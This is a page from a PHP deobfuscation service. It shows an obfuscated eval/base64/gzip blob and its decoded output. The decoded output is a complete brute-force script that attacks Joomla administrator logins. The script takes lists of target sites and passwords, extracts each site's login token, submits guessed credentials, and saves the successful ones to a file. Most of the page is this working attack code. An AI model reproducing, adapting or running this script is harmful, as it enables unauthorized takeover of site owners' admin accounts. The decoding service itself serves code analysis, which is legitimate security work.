Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval("?>".gzuncompress(base64_decode("eJztVd1v2kgQf6/U/2G6QbHRGRsnF10vfLQkgSgtDREf6gMgyzHr..
Decoded Output download
?>b'<?
@set_time_limit(0);
# joomla brute Force
# Coded by Th3 K!LL3r Dz
# Devloped by Th3 K!LL3r Dz
if($_POST[\'x\']){
echo "<hr>";
$sites = explode("
",file_get_contents($_FILES["sites"]["tmp_name"])); // Get Sites !
$w0rds = explode("
",file_get_contents($_FILES["w0rds"]["tmp_name"])); // Get w0rdLiSt !
$Attack = new Joomla_brute_Force(); // Active Class
foreach($w0rds as $pwd){
foreach($sites as $site){
$Attack->check_it(txt_cln($site),$_POST[\'usr\'],txt_cln($pwd)); // Brute :D
flush();flush();
}
}
}
# Class & Function\'z
function txt_cln($value){ return str_replace(array("
","
"),"",$value); }
class Joomla_brute_Force{
public function check_it($site,$user,$pass){ // print result
if(eregi(\'com_config\',$this->post($site,$user,$pass))){
echo "<span class=\"x2\"><b># Successful : $user:$pass -> <a href=\'$site/administrator/index.php\'>$site/administrator/index.php</a></b></span><BR>";
$f = fopen("Result.txt","a+"); fwrite($f , "Success > $user:$pass -> $site/administrator/index.php
"); fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
}
public function post($site,$user,$pass){ // Post -> user & pass
$token = $this->extract_token($site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\');
curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\');
curl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4\');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,\'username=\'.$user.\'&passwd=\'.$pass.\'&lang=en-GB&option=com_login&task=login&\'.$token.\'=1\');
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
public function extract_token($site){ // get token from source for -> function post
$source = $this->get_source($site);
preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
return $token[1][0];
}
public function get_source($site){ // get source for -> function extract_token
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\');
curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\');
curl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4\');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
}
?>'
Did this file decode correctly?
Original Code
eval("?>".gzuncompress(base64_decode("eJztVd1v2kgQf6/U/2G6QbHRGRsnF10vfLQkgSgtDREf6gMgyzHr4MN4rd11IKn6v9/s2nBJE5L24R5OugeMPbPzm5nffGz9A7x981FQ6cloSb04WkbSrJZrKN2Dvxhbxj5c80xS6DAeUC0+ZTM6g+s7GM4P4fO7bveQw9m90pzR25ilzyrfvolCs+Rd9QbDsbE2puVvoIQ0mDMg9TlvkpoWlEQkqYAG0HUaoyOTTBJihVFMvRuMMmCJpIkUCNW56LYHY6LPk+mYyGXqJf6SkmkZ43ccOKcSBhrtXQ69qvLZr0Dr8zuhlbYbDeQGvSWlHywQPqEr+KSp8zR1nqbOzC1bgYxuKZzGvhDaLmSc+sHcLKLzBZTS1aygZ6vMWVFK9VZoC5eVZjCnwcLDysk15hEn+fmyteE7E9yYWlulws+jOdGlPT5DuDDOxByD3Pyj6Lv28vCpy69D34dOlmAuLDHu81CLT9i6ufXjTIUKnMqMJyAk9zhNYx/J8Dn37/ICkAknZYsQqzCoQe4r0H6eEpnnnmbXcRTA1uuWAp26VcoE5VYpRQiMADNNeZRIjERksYSiHSmnN5FpBGypih9GN4ZVkvNIVJopE88hlR93rUh9dKzCbEzI+mBCmvXr5h4MsiCgQoRZDMegzY+1OVSaUPdhzmnYMDS448+WURIhMb5k3ImSGV3b6Tw1mi+q647frDvX+FMRNOsnfZwebIcQmy/E+UtM0teJ2lgLJNj/jSCr4YojpomnLCBFjND8McAXHWO5FFAQM6GAdJM87BcaCyxPzs4edHwcrdlTDrSLPGjYWD9ssh9Lu6MYuqxXqFOYSo49mW6mqiTZgibIR1FQusZcAtxySlyMR7FwgozHDfXwMGVpFmItwL3IUvStPqzTUb/buxp6/fZw1L8c9luXg067b7naYPdx/LO0P5vsopW8AnHa632+aKulZGGzskVEVWGNn7L61Or/itFo0O63ztuXQ8v4wu6jOPadI7sK5lcMlq1EDUY1KN7hcghHtlsDmlRGgxrw22PXfm+7tntUxgUZLJhzUK2+d1330P0DoBNh37O1c2hX7d9fC6PT63Z7X7u909bwonf5Ksdqy/3Uoc5Fu3s2sAzVLmqhNwxbt5Rt7KvWWc2UQL2hIPaTmwbmdn6yj2DYiA21KGJ2EyX70heLRv6KBrqpbKPhvpbW8OJLuzcaWgfVTfPRNQ3y5lNv+fF/QIpB2wqLRaqtai9MzHPdrscF7znIJyPkbAmCZepSx1tGzdCjgSsu4/zAdozUPZnLHs1QiovUW/oymHt+HJvEkXcpxZ04j2YzmkwIaK4nxBxXK3/6lXD67fDgexnleuOjwp0QR0QErMKjlXNawG/S1rKxOx1Xpy9l/yTIbeo78n1E1+6l8P9K+A+thH9r1NTzQ/NvB6t8YQ=="))); ?>
Function Calls
gzuncompress | 1 |
base64_decode | 1 |
Stats
MD5 | 47c4878484b0ff6430bc472710e91776 |
Eval Count | 1 |
Decode Time | 72 ms |